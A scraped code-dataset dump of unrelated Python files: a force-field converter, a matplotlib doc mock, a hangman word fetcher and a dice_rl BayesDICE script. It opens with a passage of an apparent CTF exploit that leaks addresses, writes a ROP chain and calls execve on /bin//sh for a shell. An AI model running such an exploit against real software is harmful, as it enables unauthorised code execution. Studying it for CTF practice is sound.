n.sendline("1")
return int(n.recvuntil('\n'),16)
def leak_pie():
n.recvuntil('>')
n.sendline('2')
return int(n.recvuntil('\n'),16)
def write(addr,data):
n.recvuntil('address :')
n.send(str(int(addr)))
n.recvuntil('data : ')
n.send(data)
def write_bss(idx):
i = 8*idx
stack = leak_stack()
write(bss_addr+i,rop[i:i+8])
for i in range(2):
stack = leak_stack()
log.success(hex(stack))
ret = stack - 8
write(ret,p64(main_addr))
stack = leak_stack()
log.success(hex(stack))
ret = stack - 8
write(ret,'\x15') # 0x7ffff7d52ab2 (do_leak+157) -> 0x7ffff7d52a15 (do_leak)
pie = leak_pie()
codebase = pie - 0x8a15
log.success(hex(codebase))
##### leak stack codebase && edit ret ####
bss_addr = codebase + elf.bss()
main_addr = codebase + 0x8ab8
pb = lambda x : p64(x + codebase)
rop = pb(0x000000000000d9f2) # pop rsi ; ret
rop += pb(0x00000000002b1120) # @ .data
rop += pb(0x00000000000460ac) # pop rax ; ret
rop += '/bin//sh'
rop += pb(0x0000000000077901) # mov qword ptr [rsi], rax ; ret
rop += pb(0x000000000000d9f2) # pop rsi ; ret
rop += pb(0x00000000002b1128) # @ .data + 8
rop += pb(0x0000000000041360) # xor rax, rax ; ret
rop += pb(0x0000000000077901) # mov qword ptr [rsi], rax ; ret
rop += pb(0x00000000000084fa) # pop rdi ; ret
rop += pb(0x00000000002b1120) # @ .data
rop += pb(0x000000000000d9f2) # pop rsi ; ret
rop += pb(0x00000000002b1128) # @ .data + 8
rop += pb(0x00000000000484c5) # pop rdx ; ret
rop += pb(0x00000000002b1128) # @ .data + 8
rop += pb(0x0000000000041360) # xor rax, rax ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006d940) # add rax, 1 ; ret
rop += pb(0x000000000006e605) # syscall ; ret
gadgetlen = len(rop)/8
############ loading gadget ##############
#idx0
write(bss_addr,rop[0:8])
for i in range(2):
stack = leak_stack()
log.success(hex(stack))
ret = stack - 8
write(ret,p64(main_addr))
#idx 1-last
for i in range(1,gadgetlen):
write_bss(i)
########### write gadget in bss ############
pop_rsp_ret = codebase + 0x946a
stack = leak_stack()
log.success(hex(stack))
write(stack+0x38,p64(pop_rsp_ret))
stack = leak_stack()
log.success(hex(stack))
write(stack+0x20,p64(bss_addr))
########### jmp bss getshell #############
n.interactive()
| [
"3066574695@qq.com"
] | 3066574695@qq.com |
22ee7ccbcbad29146f0ad48648691bdaa31a3adc | 97db95833780dad8537a647a7ff90d0e2eeec686 | /forcefields/alkanes/propane/TRAPPE2FESST_2.0.py | f4e1a6c1fc7b4a0f5bbf761a591f06571fb51549 | [] | no_license | chr218/TRAPPE_ff_FEASST | 3c21460f8f353bb0a72a2664d156b32c508ba7eb | afcf7717b11c62f61e39b8285b0ea3053ac215ec | refs/heads/main | 2022-12-31T23:03:38.624039 | 2020-10-23T05:27:22 | 2020-10-23T05:27:22 | 305,815,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,146 | py | # -*- coding: utf-8 -*-
"""
Spyder Editor
The purpose of this code is to convert the parameters taken from Siepmann's
website (TRAPPE-UA) into FEASST readible input files. The input files are
restrcited to rigid molecules.
Author: Christopher Rzepa
email: cvr5246@gmail.com
"""
import numpy as np
import time
import sys
from scipy import constants
from ase.data.pubchem import pubchem_atoms_search
from ase.geometry.analysis import Analysis
'''
Constants
'''
NA = constants.physical_constants['Avogadro constant']
kB = constants.physical_constants['Boltzmann constant']
#print(constants.calorie)
'''
Functions & Subroutines
'''
def get_psuedoatoms(atoms_obj,TRAP_atms,TRAP_bonds):
ana_H = Analysis(atoms_obj)
#Collect bond distances from ASE atoms.-Find easier way to do this!
ASE_bond_dist = []
ASE_bond_atms = []
atm_bonds_list = ana_H.unique_bonds[0]
for index, atm_bonds in enumerate(atm_bonds_list):
for neighbor in atm_bonds:
dist = np.linalg.norm(atoms_obj[index].position-atoms_obj[neighbor].position)
ASE_bond_dist.append(dist)
ASE_bond_atms.append([index,neighbor])
H_index = []
ASE_bond_atms_cp = ASE_bond_atms.copy()
ASE_bond_dist_cp = ASE_bond_dist.copy()
atoms_obj_cp = atoms_obj.copy()
#If "H" is in psuedo potentials, we must include it and collect it's index.
if 'H' in TRAP_atms[:,1]:
for bond in TRAP_bonds:
if 'H' in bond[2].split('-'):
H_bond_dist = float(bond[3])
indx, value = find_nearest(ASE_bond_dist_cp,H_bond_dist)
for i in (ASE_bond_atms_cp[indx]):
if atoms_obj_cp[i].symbol == 'H':
H_index.append(atoms_obj_cp[i].index)
ASE_bond_atms_cp.pop(indx)
ASE_bond_dist_cp.pop(indx)
#Determine hybridization. "atoms_C" does not strictly apply to carbon atoms.
atoms_H = atoms_obj.copy()
del atoms_H[[atom.index for atom in atoms_H if not atom.symbol=='H']]
atoms_C = atoms_obj.copy()
del atoms_C[[atom.index for atom in atoms_C if atom.symbol=='H' and atom.index not in H_index]]
for i,C in enumerate(atoms_C):
hybridization = 0
if C.symbol == 'C':
for j,H in enumerate(atoms_H):
if np.linalg.norm(C.position-H.position) < 1.2:
hybridization += 1
atoms_C[i].mass += hybridization*(atoms_H[0].mass)
atoms_C[i].tag = hybridization
return atoms_C
def get_TRAPPE_params(fname):
main_full = []
main = []
f = open(fname,"r")
for line in f:
stripped_line = line.strip()
if stripped_line == '': #Skip new lines
continue
else:
main.append(stripped_line.split(','))
main_full.append(stripped_line.split(' '))
f.close()
TRAPPE_name = main_full[0]
TRAPPE=[[],[]] #List constaining TRAPPE atoms [0] and TRAPPE bonds [1] info.
for i, line in enumerate(main):
if 'stretch' in line:
j = i
while '#' not in main[j+1]:
TRAPPE[1].append(main[j+1])
j += 1
if '(pseudo)atom' in line:
j = i
while '#' not in main[j+1]:
TRAPPE[0].append(main[j+1])
j += 1
#Convert TRAPPE list into array for psuedoatoms and array for bonds:
TRAPPE_atoms_arr = (np.asarray(TRAPPE[0]).reshape((len(TRAPPE[0]),len(TRAPPE[0][0]))))
TRAPPE_bonds_arr = (np.asarray(TRAPPE[1]).reshape((len(TRAPPE[1]),len(TRAPPE[1][0]))))
return TRAPPE_atoms_arr, TRAPPE_bonds_arr, TRAPPE_name
#Used within "Order_atoms_wrt_TRAPPE" to find closest matching bond distance.
def find_nearest(array, value):
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx, array[idx]
#Orders the ASE atom indieces w.r.t TRAPPE atom indices.
def Order_atoms_wrt_TRAPPE(ASE_atms, ASE_geom, TRAP_bonds,TRAP_atms):
#Create list of psuedoatom strings.
ASE_hybrid_list = []
for i, atm in enumerate(ASE_atms):
if atm.symbol =='C':
if atm.tag == 0:
ASE_hybrid_list.append('C')
elif atm.tag == 1:
ASE_hybrid_list.append('CH')
else:
ASE_hybrid_list.append('CH' + str(atm.tag))
elif atm.symbol != 'C':
ASE_hybrid_list.append(atm.symbol)
#Collect bond distances from ASE atoms.-Find easier way to do this!
ASE_bond_dist_list = []
ASE_bond_atms = []
ASE_bond_hybrids = []
atm_bonds_list = ana.unique_bonds[0]
for index, atm_bonds in enumerate(atm_bonds_list):
for neighbor in atm_bonds:
dist = np.linalg.norm(psuedo_atoms[index].position-psuedo_atoms[neighbor].position)
ASE_bond_dist_list.append(dist)
ASE_bond_atms.append([index,neighbor])
ASE_bond_hybrids.append([ASE_hybrid_list[index],ASE_hybrid_list[neighbor]])
#Collect bond distances from TRAPPE params.
#Strip quotation marks and convert to int.
TRAP_bond_dist_list = []
TRAP_bond_atms = []
TRAP_bond_hybrids = []
TRAP_bond_charges = []
for i,bond in enumerate(TRAP_bonds):
TRAP_bond_dist = float(bond[-1])
TRAP_bond_dist_list.append(TRAP_bond_dist)
TRAP_bond_desc = bond[1].split('-')
TRAP_bond_atms.append(TRAP_bond_desc)
TRAP_bond_hybrids.append([])
TRAP_bond_charges.append([])
#Clean TRAPPE psuedo atom params
for i,bond2 in enumerate(TRAP_bond_atms):
#Clean atom indices wihtin bond type.
for j,el in enumerate(bond2):
TRAP_bond_atms[i][j] = el.strip('\'\"')
#Collect hybridization of psuedoatoms corresponding to bond.
for k,line in enumerate(TRAP_atms):
if TRAP_bond_atms[i][j].strip() == line[0]:
TRAP_bond_hybrids[i].append(line[1])
TRAP_bond_charges[i].append(line[-1])
skip_ASE_indices = []
skip_TRAPPE_indices = []
ASE_new_positions = []
#Match TRAPPE bonds/indices w/ ASE bonds/indices.
for i, dist in enumerate(TRAP_bond_dist_list):
#Find index and value of ASE bond length which is closest to TRAPPE bond length.
ASE_bond_dist_list_tmp = ASE_bond_dist_list.copy()
indx, value = find_nearest(ASE_bond_dist_list,dist)
#Ensure hybrids in ASE bond match TRAPPE bond.
timeout_loop = time.time() + 60
while not set(TRAP_bond_hybrids[i]) == set(ASE_bond_hybrids[indx]):
ASE_bond_dist_list_tmp[indx] = 0
indx, value = find_nearest(ASE_bond_dist_list_tmp,dist)
if time.time() > timeout_loop:
sys.exit('Error: ASE Hybrids could not be matched with TRAPPE Hybrids. Check SMILES structure &/or adjust Hydrogen bond criterion.')
#Change ASE index to TRAPPE index by matching psuedoatom hybridization.
for j,TRAPE_hybrid in enumerate(TRAP_bond_hybrids[i]):
#print(TRAP_bond_atms[i][j])
for k, ASE_hybrid in enumerate(ASE_bond_hybrids[indx]):
#Ensure that closest bond distance assumption is valid.
if TRAPE_hybrid not in ASE_bond_hybrids[indx]:
sys.exit('Error: Hybrid not found in ASE bond. Check distances.')
elif TRAPE_hybrid == ASE_hybrid:
#Collect corresponding ASE info.
#print(ASE_bond_atms[indx],ASE_bond_dist_list[indx],ASE_bond_hybrids[indx])
#Collect corresponding TRAPPE info.
#print(TRAP_bond_atms[i],TRAP_bond_dist_list[i],TRAP_bond_hybrids[i])
#print(TRAP_bond_atms[i][j])
for z,atm in enumerate(ASE_atms):
if atm.index == int(ASE_bond_atms[indx][k]) and atm.index not in skip_ASE_indices and int(TRAP_bond_atms[i][j]) not in skip_TRAPPE_indices:
ASE_new_positions.append([int(TRAP_bond_atms[i][j]),atm.mass,TRAP_bond_charges[i][j],atm.position])
skip_ASE_indices.append(atm.index)
skip_TRAPPE_indices.append(int(TRAP_bond_atms[i][j]))
ASE_bond_dist_list[indx] = False
ASE_bond_atms[indx] = False
ASE_bond_hybrids[indx] = False
return ASE_new_positions
'''
Main Program Begins Here
'''
#TRAPPE
#Collect TRAPPE input params
TRAPPE_fname = 'trappe_parameters_3.txt'
TRAPPE_atoms, TRAPPE_bonds, TRAPPE_name = get_TRAPPE_params(TRAPPE_fname)
#ASE
#Convert Smiles string into Atoms object.
SMILES = 'CCC'
atoms = pubchem_atoms_search(smiles=SMILES)
#Determine psuedo-atoms of molecule and remove hydrogens.
psuedo_atoms = get_psuedoatoms(atoms,TRAPPE_atoms,TRAPPE_bonds)
ana = Analysis(psuedo_atoms) #Create geometry analysis object from Atoms object.
organized_ASE_atoms = Order_atoms_wrt_TRAPPE(psuedo_atoms,ana,TRAPPE_bonds,TRAPPE_atoms)
#Center the psuedo_atoms. FEASST requires atom[0] to be located within origin!
for atm in organized_ASE_atoms:
if atm[0] == 1:
center_about = np.copy(atm[-1])
break
for atm in organized_ASE_atoms:
atm[-1] -= center_about
'''
File Output
'''
f = open('FEASST_'+TRAPPE_fname.split('_')[-1].split('.')[0]+'.in',"w")
#Heading
f.write('# FEASST data file \n# %s \n# %s \n# %s \n' % (TRAPPE_name[0],TRAPPE_fname,SMILES))
#Preface
f.write('\n%s atoms \n%s bonds \n\n%s atom types \n%s bond types \n' %
(len(TRAPPE_atoms[:,0]),len(TRAPPE_bonds[:,0]),
len(TRAPPE_atoms[:,1]),len(TRAPPE_bonds[:,2])))
f.write('\n%s %s xlo xhi \n%s %s ylo yhi \n%s %s zlo zhi \n' %
(np.amin(psuedo_atoms.positions[:,0]),np.amax(psuedo_atoms.positions[:,0]),
np.amin(psuedo_atoms.positions[:,1]),np.amax(psuedo_atoms.positions[:,1]),
np.amin(psuedo_atoms.positions[:,2]),np.amax(psuedo_atoms.positions[:,2])))
#Masses
f.write('\nMasses\n\n')
for i,atm in enumerate(organized_ASE_atoms):
f.write('%s %s \n' % (atm[0],atm[1]))
#Pair Coeffs
f.write('\nPair Coeffs\n\n')
for i,line in enumerate(TRAPPE_atoms):
f.write('%s %s %s \n' % (TRAPPE_atoms[i,0],float(TRAPPE_atoms[i,3])*kB[0]*NA[0]/1000,TRAPPE_atoms[i,4]))
#Bond Coeffs
f.write('\nBond Coeffs\n\n')
for i,line in enumerate(TRAPPE_bonds):
f.write('%s -1 %s \n' % (TRAPPE_bonds[i,0],TRAPPE_bonds[i,-1]))
#Atoms
f.write('\nAtoms\n\n')
for i,atm in enumerate(organized_ASE_atoms):
f.write('%s %s %s %s %s %s %s 0 0 0\n' % (atm[0],1,atm[0],atm[2],atm[3][0],atm[3][1],atm[3][2]))
#Bonds
f.write('\nBonds\n\n')
for i,bond in enumerate(TRAPPE_bonds):
f.write('%s %s %s %s\n' % (bond[0],bond[0],bond[1].strip('"\'').split('-')[0].strip(),bond[1].strip('"\'').split('-')[1].strip()))
f.close() | [
"chr218@sol.cc.lehigh.edu"
] | chr218@sol.cc.lehigh.edu |
d3f0507bedcb7480314209d9473afa6749e406ff | e1f8bb28b022720445debea589c9cf091103a303 | /doc/sphinxext/mock_gui_toolkits.py | 097a3409b16793df0a2333fa9b2e06ab2289e15a | [] | no_license | demotu/matplotlib | e5a4e6c7047373b3ead918c40c97f93eb09c562d | 1662e05278ecaea064b9149c4fcb15df9f337862 | refs/heads/master | 2021-01-22T00:06:39.310427 | 2018-06-12T20:38:12 | 2018-06-12T20:38:12 | 24,751,842 | 1 | 0 | null | 2018-06-12T20:38:13 | 2014-10-03T08:38:36 | Python | UTF-8 | Python | false | false | 6,886 | py | import sys
from unittest.mock import MagicMock
class MyCairoCffi(MagicMock):
pass
class MyPyQt4(MagicMock):
class QtGui(object):
# PyQt4.QtGui public classes.
# Generated with
# textwrap.fill([name for name in dir(PyQt4.QtGui)
# if isinstance(getattr(PyQt4.QtGui, name), type)])
_QtGui_public_classes = """\
Display QAbstractButton QAbstractGraphicsShapeItem
QAbstractItemDelegate QAbstractItemView QAbstractPrintDialog
QAbstractProxyModel QAbstractScrollArea QAbstractSlider
QAbstractSpinBox QAbstractTextDocumentLayout QAction QActionEvent
QActionGroup QApplication QBitmap QBoxLayout QBrush QButtonGroup
QCalendarWidget QCheckBox QClipboard QCloseEvent QColor QColorDialog
QColumnView QComboBox QCommandLinkButton QCommonStyle QCompleter
QConicalGradient QContextMenuEvent QCursor QDataWidgetMapper QDateEdit
QDateTimeEdit QDesktopServices QDesktopWidget QDial QDialog
QDialogButtonBox QDirModel QDockWidget QDoubleSpinBox QDoubleValidator
QDrag QDragEnterEvent QDragLeaveEvent QDragMoveEvent QDropEvent
QErrorMessage QFileDialog QFileIconProvider QFileOpenEvent
QFileSystemModel QFocusEvent QFocusFrame QFont QFontComboBox
QFontDatabase QFontDialog QFontInfo QFontMetrics QFontMetricsF
QFormLayout QFrame QGesture QGestureEvent QGestureRecognizer QGlyphRun
QGradient QGraphicsAnchor QGraphicsAnchorLayout QGraphicsBlurEffect
QGraphicsColorizeEffect QGraphicsDropShadowEffect QGraphicsEffect
QGraphicsEllipseItem QGraphicsGridLayout QGraphicsItem
QGraphicsItemAnimation QGraphicsItemGroup QGraphicsLayout
QGraphicsLayoutItem QGraphicsLineItem QGraphicsLinearLayout
QGraphicsObject QGraphicsOpacityEffect QGraphicsPathItem
QGraphicsPixmapItem QGraphicsPolygonItem QGraphicsProxyWidget
QGraphicsRectItem QGraphicsRotation QGraphicsScale QGraphicsScene
QGraphicsSceneContextMenuEvent QGraphicsSceneDragDropEvent
QGraphicsSceneEvent QGraphicsSceneHelpEvent QGraphicsSceneHoverEvent
QGraphicsSceneMouseEvent QGraphicsSceneMoveEvent
QGraphicsSceneResizeEvent QGraphicsSceneWheelEvent
QGraphicsSimpleTextItem QGraphicsTextItem QGraphicsTransform
QGraphicsView QGraphicsWidget QGridLayout QGroupBox QHBoxLayout
QHeaderView QHelpEvent QHideEvent QHoverEvent QIcon QIconDragEvent
QIconEngine QIconEngineV2 QIdentityProxyModel QImage QImageIOHandler
QImageReader QImageWriter QInputContext QInputContextFactory
QInputDialog QInputEvent QInputMethodEvent QIntValidator QItemDelegate
QItemEditorCreatorBase QItemEditorFactory QItemSelection
QItemSelectionModel QItemSelectionRange QKeyEvent QKeyEventTransition
QKeySequence QLCDNumber QLabel QLayout QLayoutItem QLineEdit
QLinearGradient QListView QListWidget QListWidgetItem QMainWindow
QMatrix QMatrix2x2 QMatrix2x3 QMatrix2x4 QMatrix3x2 QMatrix3x3
QMatrix3x4 QMatrix4x2 QMatrix4x3 QMatrix4x4 QMdiArea QMdiSubWindow
QMenu QMenuBar QMessageBox QMimeSource QMouseEvent
QMouseEventTransition QMoveEvent QMovie QPageSetupDialog QPaintDevice
QPaintEngine QPaintEngineState QPaintEvent QPainter QPainterPath
QPainterPathStroker QPalette QPanGesture QPen QPicture QPictureIO
QPinchGesture QPixmap QPixmapCache QPlainTextDocumentLayout
QPlainTextEdit QPolygon QPolygonF QPrintDialog QPrintEngine
QPrintPreviewDialog QPrintPreviewWidget QPrinter QPrinterInfo
QProgressBar QProgressDialog QProxyModel QPushButton QPyTextObject
QQuaternion QRadialGradient QRadioButton QRawFont QRegExpValidator
QRegion QResizeEvent QRubberBand QScrollArea QScrollBar
QSessionManager QShortcut QShortcutEvent QShowEvent QSizeGrip
QSizePolicy QSlider QSortFilterProxyModel QSound QSpacerItem QSpinBox
QSplashScreen QSplitter QSplitterHandle QStackedLayout QStackedWidget
QStandardItem QStandardItemModel QStaticText QStatusBar
QStatusTipEvent QStringListModel QStyle QStyleFactory QStyleHintReturn
QStyleHintReturnMask QStyleHintReturnVariant QStyleOption
QStyleOptionButton QStyleOptionComboBox QStyleOptionComplex
QStyleOptionDockWidget QStyleOptionDockWidgetV2 QStyleOptionFocusRect
QStyleOptionFrame QStyleOptionFrameV2 QStyleOptionFrameV3
QStyleOptionGraphicsItem QStyleOptionGroupBox QStyleOptionHeader
QStyleOptionMenuItem QStyleOptionProgressBar QStyleOptionProgressBarV2
QStyleOptionRubberBand QStyleOptionSizeGrip QStyleOptionSlider
QStyleOptionSpinBox QStyleOptionTab QStyleOptionTabBarBase
QStyleOptionTabBarBaseV2 QStyleOptionTabV2 QStyleOptionTabV3
QStyleOptionTabWidgetFrame QStyleOptionTabWidgetFrameV2
QStyleOptionTitleBar QStyleOptionToolBar QStyleOptionToolBox
QStyleOptionToolBoxV2 QStyleOptionToolButton QStyleOptionViewItem
QStyleOptionViewItemV2 QStyleOptionViewItemV3 QStyleOptionViewItemV4
QStylePainter QStyledItemDelegate QSwipeGesture QSyntaxHighlighter
QSystemTrayIcon QTabBar QTabWidget QTableView QTableWidget
QTableWidgetItem QTableWidgetSelectionRange QTabletEvent
QTapAndHoldGesture QTapGesture QTextBlock QTextBlockFormat
QTextBlockGroup QTextBlockUserData QTextBrowser QTextCharFormat
QTextCursor QTextDocument QTextDocumentFragment QTextDocumentWriter
QTextEdit QTextFormat QTextFragment QTextFrame QTextFrameFormat
QTextImageFormat QTextInlineObject QTextItem QTextLayout QTextLength
QTextLine QTextList QTextListFormat QTextObject QTextObjectInterface
QTextOption QTextTable QTextTableCell QTextTableCellFormat
QTextTableFormat QTimeEdit QToolBar QToolBox QToolButton QToolTip
QTouchEvent QTransform QTreeView QTreeWidget QTreeWidgetItem
QTreeWidgetItemIterator QUndoCommand QUndoGroup QUndoStack QUndoView
QVBoxLayout QValidator QVector2D QVector3D QVector4D QWhatsThis
QWhatsThisClickedEvent QWheelEvent QWidget QWidgetAction QWidgetItem
QWindowStateChangeEvent QWizard QWizardPage QWorkspace
QX11EmbedContainer QX11EmbedWidget QX11Info
"""
for _name in _QtGui_public_classes.split():
locals()[_name] = type(_name, (), {})
del _name
class MySip(MagicMock):
def getapi(*args):
return 1
class MyWX(MagicMock):
class Panel(object):
pass
class ToolBar(object):
pass
class Frame(object):
pass
def setup(app):
sys.modules.update(
cairocffi=MyCairoCffi(),
PyQt4=MyPyQt4(),
sip=MySip(),
wx=MyWX(),
)
return {'parallel_read_safe': True, 'parallel_write_safe': True}
| [
"anntzer.lee@gmail.com"
] | anntzer.lee@gmail.com |
1633bb7068e1cd41998909fb9a5009c900e1c856 | 9bd7cb46c2628003d200e1865740f50f7ebdd538 | /BuildWord.py | 02d30f40613eeabcbf0fe41cd0f1a2bfc3a021f9 | [] | no_license | ScoobyLuffyDoo/Hang-Man-Python | 7c96861d552c116b1fc52cb30cff1469babe26fc | 06491ccccb5226919c0d0a166ad2b3da5ef2b7c1 | refs/heads/master | 2023-07-27T01:00:41.002870 | 2021-09-06T12:37:22 | 2021-09-06T12:37:22 | 318,529,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | import requests
import random
import json
# Retrives a random word form random word generator
def get_randomWord():
url = "https://randomwordgenerator.com/json/words_ws.json"
response = requests.request("GET",url)
return_results = response.json()
randomNumber= random.randint(1,3256)
randomWord = return_results['data'][randomNumber]["word"]["value"]
return randomWord | [
"jc.smal626@gmail.com"
] | jc.smal626@gmail.com |
51a5de5a76db69817407b3251044c8d8f122a59f | 264f392530710b287ac54f40ea805638c6348cc3 | /scripts/run_tabular_bayes_dice.py | 3326a3f91fd93e0b96222614b928658af9ee75ab | [
"Apache-2.0"
] | permissive | google-research/dice_rl | b26dd2231b0a664f11e0ede08d8209a4ace1cd2f | 6551950608ad0472ddf6e8f4075f51793c9d2763 | refs/heads/master | 2023-08-06T21:35:15.690175 | 2023-01-30T19:26:12 | 2023-01-30T19:27:38 | 285,369,787 | 106 | 14 | Apache-2.0 | 2023-01-30T19:27:44 | 2020-08-05T18:15:53 | Python | UTF-8 | Python | false | false | 6,480 | py | # Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script for running tabular BayesDICE.
Make sure to generate the datasets prior to running this script (see
`scripts/create_dataset.py`). The default parameters here should reproduce
the published bandit and frozenlake results. For Taxi, pass in
solve_for_state_action_ratio=False.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import numpy as np
import os
import tensorflow.compat.v2 as tf
tf.compat.v1.enable_v2_behavior()
import tensorflow_probability as tfp
import pickle
from tf_agents.environments import gym_wrapper
from tf_agents.environments import tf_py_environment
from dice_rl.environments.env_policies import get_target_policy
import dice_rl.environments.gridworld.navigation as navigation
import dice_rl.environments.gridworld.taxi as taxi
from dice_rl.estimators import estimator as estimator_lib
from dice_rl.estimators.tabular_bayes_dice import TabularBayesDice
import dice_rl.utils.common as common_utils
from dice_rl.data.dataset import Dataset, EnvStep, StepType
from dice_rl.data.tf_offpolicy_dataset import TFOffpolicyDataset
FLAGS = flags.FLAGS
flags.DEFINE_string('env_name', 'frozenlake', 'Environment name.')
flags.DEFINE_integer('seed', 0, 'Initial random seed.')
flags.DEFINE_integer('num_trajectory', 5, 'Number of trajectories to collect.')
flags.DEFINE_float('alpha', 0.0,
'How close is the behavior policy to optimal policy.')
flags.DEFINE_integer('max_trajectory_length', 100,
'Cutoff trajectory at this step.')
flags.DEFINE_bool('tabular_obs', True, 'Whether to use tabular observations.')
flags.DEFINE_string('load_dir', None, 'Directory to load dataset from.')
flags.DEFINE_string('save_dir', None, 'Directory to save estimation results.')
flags.DEFINE_float('gamma', 0.99, 'Discount factor.')
flags.DEFINE_integer('num_steps', 50000, 'Number of training steps.')
flags.DEFINE_integer('batch_size', 1024, 'Batch size.')
flags.DEFINE_float('zeta_learning_rate', 1e-2, 'Zeta learning rate.')
flags.DEFINE_float('nu_learning_rate', 1e-2, 'Value learning rate.')
flags.DEFINE_bool('solve_for_state_action_ratio', True,
'Whether to use tabular observations.')
flags.DEFINE_float('alpha_target', 1.0,
'How close is the target policy to optimal policy.')
flags.DEFINE_float('kl_regularizer', 1., 'LP regularizer of kl(q||p).')
flags.DEFINE_float('eps_std', 1., 'Epsilon std for reparametrization.')
def main(argv):
env_name = FLAGS.env_name
seed = FLAGS.seed
tabular_obs = FLAGS.tabular_obs
num_trajectory = FLAGS.num_trajectory
max_trajectory_length = FLAGS.max_trajectory_length
load_dir = FLAGS.load_dir
save_dir = FLAGS.save_dir
gamma = FLAGS.gamma
assert 0 <= gamma < 1.
alpha = FLAGS.alpha
alpha_target = FLAGS.alpha_target
num_steps = FLAGS.num_steps
batch_size = FLAGS.batch_size
zeta_learning_rate = FLAGS.zeta_learning_rate
nu_learning_rate = FLAGS.nu_learning_rate
solve_for_state_action_ratio = FLAGS.solve_for_state_action_ratio
eps_std = FLAGS.eps_std
kl_regularizer = FLAGS.kl_regularizer
target_policy = get_target_policy(
load_dir, env_name, tabular_obs, alpha=alpha_target)
hparam_str = ('{ENV_NAME}_tabular{TAB}_alpha{ALPHA}_seed{SEED}_'
'numtraj{NUM_TRAJ}_maxtraj{MAX_TRAJ}').format(
ENV_NAME=env_name,
TAB=tabular_obs,
ALPHA=alpha,
SEED=seed,
NUM_TRAJ=num_trajectory,
MAX_TRAJ=max_trajectory_length)
directory = os.path.join(load_dir, hparam_str)
print('Loading dataset.')
dataset = Dataset.load(directory)
print('num loaded steps', dataset.num_steps)
print('num loaded total steps', dataset.num_total_steps)
print('num loaded episodes', dataset.num_episodes)
print('num loaded total episodes', dataset.num_total_episodes)
print('behavior per-step',
estimator_lib.get_fullbatch_average(dataset, gamma=gamma))
train_hparam_str = ('eps{EPS}_kl{KL}').format(EPS=eps_std, KL=kl_regularizer)
if save_dir is not None:
# Save for a specific alpha target
target_hparam_str = hparam_str.replace(
'alpha{}'.format(alpha), 'alpha{}_alphat{}'.format(alpha, alpha_target))
save_dir = os.path.join(save_dir, target_hparam_str, train_hparam_str)
summary_writer = tf.summary.create_file_writer(logdir=save_dir)
else:
summary_writer = tf.summary.create_noop_writer()
estimator = TabularBayesDice(
dataset_spec=dataset.spec,
gamma=gamma,
solve_for_state_action_ratio=solve_for_state_action_ratio,
zeta_learning_rate=zeta_learning_rate,
nu_learning_rate=nu_learning_rate,
kl_regularizer=kl_regularizer,
eps_std=eps_std,
)
estimator.prepare_dataset(dataset, target_policy)
